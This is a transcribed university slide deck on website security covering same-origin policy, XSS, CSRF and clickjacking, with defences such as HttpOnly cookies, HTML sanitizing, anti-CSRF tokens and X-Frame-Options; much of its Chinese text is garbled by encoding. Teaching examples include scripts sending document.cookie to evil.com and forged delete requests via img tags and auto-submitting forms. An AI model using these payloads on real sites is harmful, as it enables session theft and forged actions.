Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Selected Topics on Website Security @ 102-2 CCSP

1b56cc5159a07e4eee8f819c1a2557e9?s=47 Johnson Liang
May 29, 2014
Technology
1
390

Selected Topics on Website Security @ 102-2 CCSP

Concept of Same Origin Policy, XSS, CSRF & Clickjacking

1b56cc5159a07e4eee8f819c1a2557e9?s=128

Johnson Liang

May 29, 2014
Tweet

More Decks by Johnson Liang

See All by Johnson Liang
Political Promise Tracker 政治承諾追蹤網 g0v-hackath14n 提案
1b56cc5159a07e4eee8f819c1a2557e9?s=48 mrorz
0
110
群眾協作的一些事—— 「自經區正反意見比較表」到 「臺北市長選舉承諾一覽表」到 「PPT 政治承諾追蹤網」
1b56cc5159a07e4eee8f819c1a2557e9?s=48 mrorz
0
210
Political Promise Tracker 政治承諾追蹤網 g0v-hackath12n 提案
1b56cc5159a07e4eee8f819c1a2557e9?s=48 mrorz
0
420
[Thesis Defense] SeeSS: Instant Change Impact Visualization for CSS developers
1b56cc5159a07e4eee8f819c1a2557e9?s=48 mrorz
0
140
g0v-hackath10n 提案 -- 2014 台北市長政見比較表
1b56cc5159a07e4eee8f819c1a2557e9?s=48 mrorz
0
130
網路及平台服務程式設計及零時政府 @ 創新網路技術推廣說明會
1b56cc5159a07e4eee8f819c1a2557e9?s=48 mrorz
0
66
g0v-hackath9n 提案 -- 自經區正反意見比較表
1b56cc5159a07e4eee8f819c1a2557e9?s=48 mrorz
0
63
CCSP 2014 期末成果展行前須知
1b56cc5159a07e4eee8f819c1a2557e9?s=48 mrorz
0
310
Google Analytics @ 102-2 CCSP
1b56cc5159a07e4eee8f819c1a2557e9?s=48 mrorz
0
220

Other Decks in Technology

See All in Technology
ROS再入門​-はじめてのSLAM-
4b2f3a64637b51e81813accbe8a98083?s=48 miura55
0
410
How to start with DDD when you have a Monolith
Ac38eb7117f177d961362cfe1387341b?s=48 javujavichi
0
340
JUnit5.7, 5.8の新機能紹介 #jjug_ccc #jjug_ccc_b / junit 5.7, 5.8 new features
405fe9ab689473f267e2cfbd95f78c75?s=48 kyonmm
PRO
2
420
220628 「Google AppSheet」タスク管理アプリをライブ作成 吉積情報伊藤さん
50bc42471d197d0dbef7171f2ef85bb6?s=48 comucal
PRO
0
240
Custom GitHub Actions by Java
E68f2e8b47dc1769380a1fa8181df3dd?s=48 kazamori
0
290
スクラムのスケールとチームトポロジー / Scaled Scrum and Team Topologies
4dd89003cc8fe9f21d67b0c99b773436?s=48 daiksy
1
450
ノーコードで Stripeを使いこなす3つの方法 / jp-stripes-online-vol-4
E77ca94266ffd3d69f8aee91f7468264?s=48 stripehideokamoto
0
300
Modern Android dependency injection
A9f24621ff57d380b4e85799edd4a984?s=48 hugovisser
1
130
今どきのLinux事情
4241bfe2a981350a7950f3875d9f441a?s=48 tokida
43
35k
アーキテクチャを明文化して開発に臨んだ話
903c7dbf16067d22e7b03ead7d8acdc5?s=48 akkie76
0
340
プログラマがオブジェクト指向しても幸せになれない理由
Bf7fe621f4fe1615c228ef8a79b87282?s=48 shirayanagiryuji
0
150
Target SDK Versionを上げない Notification runtime permission対応
0c5e92294cc0cfba620641c589db9378?s=48 napplecomputer
0
150

Featured

See All Featured
Creatively Recalculating Your Daily Design Routine
48c098b6579220a67a6ba949be6e4b5a?s=48 revolveconf
207
10k
From Idea to $5000 a Month in 5 Months
E4f5d494ebdc9e7cce1aecf3ce3e8bc1?s=48 shpigford
373
44k
Typedesign – Prime Four
A0517b08532aec8ab2aae3f65d40ad86?s=48 hannesfritz
34
1.4k
Design by the Numbers
027d1ebf66cc039a0bd3b55eeadbe75d?s=48 sachag
271
17k
Music & Morning Musume
A60068bce2e73de3a37ca9d2dbe36092?s=48 bryan
35
4.2k
BBQ
761be20b5ebd271008bcee1244fc5b52?s=48 matthewcrist
74
7.9k
Three Pipe Problems
11c84dff30266b907714802088852677?s=48 jasonvnalue
89
8.7k
Side Projects
027d1ebf66cc039a0bd3b55eeadbe75d?s=48 sachag
450
37k
The Web Native Designer (August 2011)
0bce06bd06ee7a2c4f5500f25dcf7f18?s=48 paulrobertlloyd
74
1.9k
Fontdeck: Realign not Redesign
0bce06bd06ee7a2c4f5500f25dcf7f18?s=48 paulrobertlloyd
73
4.1k
ParisWeb 2013: Learning to Love: Crash Course in Emotional UX Design
651dcfe41723207fbb0aa044a4f7c07f?s=48 dotmariusz
100
5.9k
The Illustrated Children's Guide to Kubernetes
0438ae60cde4c7add6f9da48f28c15cc?s=48 chrisshort
15
36k

Transcript

  1. Selected Topics on Website Security Concept of Same Origin Policy,

    XSS, CSRF & Clickjacking MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全

  2. খࢿ҆શ޲લি Concept of Same Origin Policy, XSS, CSRF & Clickjacking

    MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全

  3. Same-Origin Policy ಉݯ੓ࡦ

  4. ᖣ᧸ث࠷֩৺໵࠷جຊత҆શޭೳʜʜ 8FCੋݐߏࡏಉݯ੓ࡦతجૅ೭্తɻ – 吳翰清 ❝ ❞

  5. Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦੢ ڈ፤ త౦੢

    㑌ݸᖣ᧸ث౎။ɿ

  6. Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦੢ ڈ፤ త౦੢

    एᔒ༗ಉݯ੓ࡦɿ

  7. Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦੢ ڈ፤ త౦੢

    Upon visiting http://evil.mobile.org : $.get(‘http://facebook.com’, {}, function(data){ // 未經允許就得到你的 Facebook 塗鴉牆 }, ‘html’); एᔒ༗ಉݯ੓ࡦɿ

  8. https://developer.mozilla.org/zh-TW/docs/JavaScript/Same_origin_policy_for_JavaScript host, port & protocol Same Origin Different Origin

  9. ༬ઃڋ㘺ލ໢Ҭ፤ࢿྉ Լྻҝಛྫ

  10. ಛྫҰɿՄލ໢Ҭࡌೖࢿݯ೭ඪត • <script> • <img> • <iframe> • <link> •

    Javascript 無從讀寫其內容

  11. ಛྫೋɿ$SPTT0SJHJO 3FTPVSDF4IBSJOH $034 • Origin request header • Access-Control-Allow-XXX response

    header • Enabling cross-origin ajax, web font, WebGL & canvas

  12. Cross-Site Scripting (XSS)

  13. ࢦ᱆٬ಁաʮ)5.-২ೖʯ篡վྃ໢ทɼᎎೖྃ ዱҙతࢦྩߘɼਐҰ㑊ࡏ࢖༻ऀᖣ᧸໢ท࣌ɼ߇ ੍࢖༻ऀᖣ᧸ثతҰछ߈㐝ɻ – 吳翰清 ❝ ❞

  14. <section class="intro"> <%- user.desc %> </section> Your site : Example

    #1 ࢖༻ऀ ༌ೖత)5.-

  15. <section class="intro"> <p>Hello</p> <p>I am Johnson</p> </section> Your site :

    Example #1

  16. <section class="intro"> <script type="text/javascript"> $.getJSON('http://evil.com/', { stoken: document.cookie }); </script>

    </section> Your site : Example #1 ፨๚ࠑ༻㖽ท໘తਓɼDPPLJF။ඃFWJMDPN䫖૸

  17. <script type="text/javascript"> var pageTitle = "<%= userPage.title %>"; </script> Your

    site : Example #2 ࢖༻ऀࣗ༝༌ೖతࣈ۲

  18. <script type="text/javascript"> var pageTitle = ""; $.getJSON(...); ""; </script> Your

    site : Example #2 ፨๚ࠑ༻㖽ท໘తਓɼࢿྉ။ඃ䫖૸

  19. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3

    ࢖༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!</h1>

  20. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3

    ࢖༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!<script>$.getJSON('http://evil.com',...);</script></h1>

  21. Ṝछ߈㐝తࣔൣҊྫੋލ໢ҬతɼॴҎڣ z$SPTTz 4JUF 4DSJQUJOHɻᚙల౸ࠓఱɼੋ൱ލ໢Ҭቮៃෆ ࠶ॏཁɼ944Ṝݸ໊ࣈჟҰ௚อཹྃԼိɻ – 吳翰清 ❝ ❞

  22. ๷ڔํࣜ 防⽌止 Cookie 盜⽤用:HttpOnly res.cookie('key', 'value', { httpOnly: true });

    ༬ઃଖመबੋUSVF

  23. ๷ڔํࣜ 防⽌止 Cookie 盜⽤用:HttpOnly res.cookie('key', 'value', { httpOnly: true });

    ༬ઃଖመबੋUSVF

  24. ๷ڔํࣜ HTML 輸出檢查 — 盡量不⽤用 <%- %> <section class="intro"> <%=

    user.desc %> </section>

  25. ๷ڔํࣜ HTML 輸出檢查 — Caja-HTML-Sanitizer // Controller ! var sanitizer

    = require('sanitizer'); sanitizedIntro = sanitizer.sanitize(user.desc); ! <!-- View --> <section class="intro"> <%- sanitizedIntro %> </section> อཹແ֐త)5.-UBHT

  26. ๷ڔํࣜ Javascript 輸出檢查 — ⽤用現成 JSON.stringify <script type="text/javascript"> var page

    = <%- JSON.stringify({ title: userPage.title }) %>; </script>

  27. ๷ڔํࣜ DOM-based XSS — 盡量⽤用 .text(…) 取代 .html(…) 或先 sanitize

    想插⼊入的 HTML. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').text(data.userPageTitle); });

  28. Cross-Site Request Forgery (CSRF/XSRF)

  29. Your site : Example #4 // Delete current user account

    app.get('/user/delete', userCtrl.delete);

  30. evil.com : Example #4 <img src="http://yoursite.com/user/delete"> ፨๚ࠑFWJMTJUFతਓɼ؃౸ྃ વޙ䭪ʗଞࡏZPVSTJUFDPNతாᥒबല໊஍ඃ႟ᎃྃ

  31. ߈㐝ऀᷮᷮ༠ಋ࢖༻ऀ଄๚ྃҰݸท໘ɼबҎ֘ ࢖༻ऀత਎෼ɼࡏZPVSTJUFDPNཫࣥߦྃҰ࣍ૢ ࡞ʜʜṜछ SFRVFTU ੋ߈㐝ऀॴِ଄తɼॴҎ ڣz$SPTTTJUF3FRVFTU'PSHFSZzɻ – 吳翰清 ❝ ❞

  32. <iframe src="https://mail.google.com/mail/u/0/?logout"> Demo:cryptogasm.com/gmail-logout.html

  33. evil.com : Example #5 ፨๚FWJMTJUFޙɼ࢖༻ऀࡏZPVSTJUFDPNతாᥒबല໊஍ඃ႟ᎃྃ <form action="http://yoursite.com/user/delete" method="post" id="evil-form"> </form>

    ! <script type="text/javascript"> $('#evil-form').submit(); </script>

  34. ๷ڔํࣜ • CSRF 攻擊成功的要素:request 的所有參數都可以被 攻擊者猜測到。 • Anti-CSRF Token:使攻擊者無法拼湊正確 request。

  35. ๷ڔํࣜ

  36. ๷ڔํࣜ

  37. ๷ڔํࣜ දᄸૹग़ޙɼޙ୺DPOUSPMMFS။ᒾ查දᄸత UPLFOੋ൱ᢛDPPLJFதతUPLFO૬ූɼ एෆҰᒬɼबෆ၏ࣄɻ

  38. ๷ڔํࣜ http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3 // Express settings ! app.use(express.cookieParser('optional secret string')); app.use(express.session());

    app.use(express.csrf()); app.use(function (req, res, next) { res.locals.csrftoken = req.csrfToken(); next(); }); ! ! ! <!-- View --> ! <form action="..." method="post"> <input type="hidden" name="_csrf" value="<%= csrftoken %>"> </form> ᩋTFTTJPOཫతBOUJDTSGUPLFO ࡏWJFXཫ໵ೳ፤ಘ౸

  39. Clickjacking

  40. Jeremiah Grossman and Robert Hansen, 2008

  41. http://www.crazylearner.org/clickjacking-example/ Copyright 2014 Crazylearner. Fair use

  42. None

  43. ๷ڔํࣜ w ᩋ㟬త໢᜾ෆඃ࠹ਐJGSBNFཫ • x-frame-options: deny w IUUQTHJUIVCDPNFWJMQBDLFUIFMNFU Can’t be

    your site!

  44. http://youtu.be/VRCUpXLguHM 吳翰清 著

  45. http://youtu.be/VRCUpXLguHM 吳翰清 著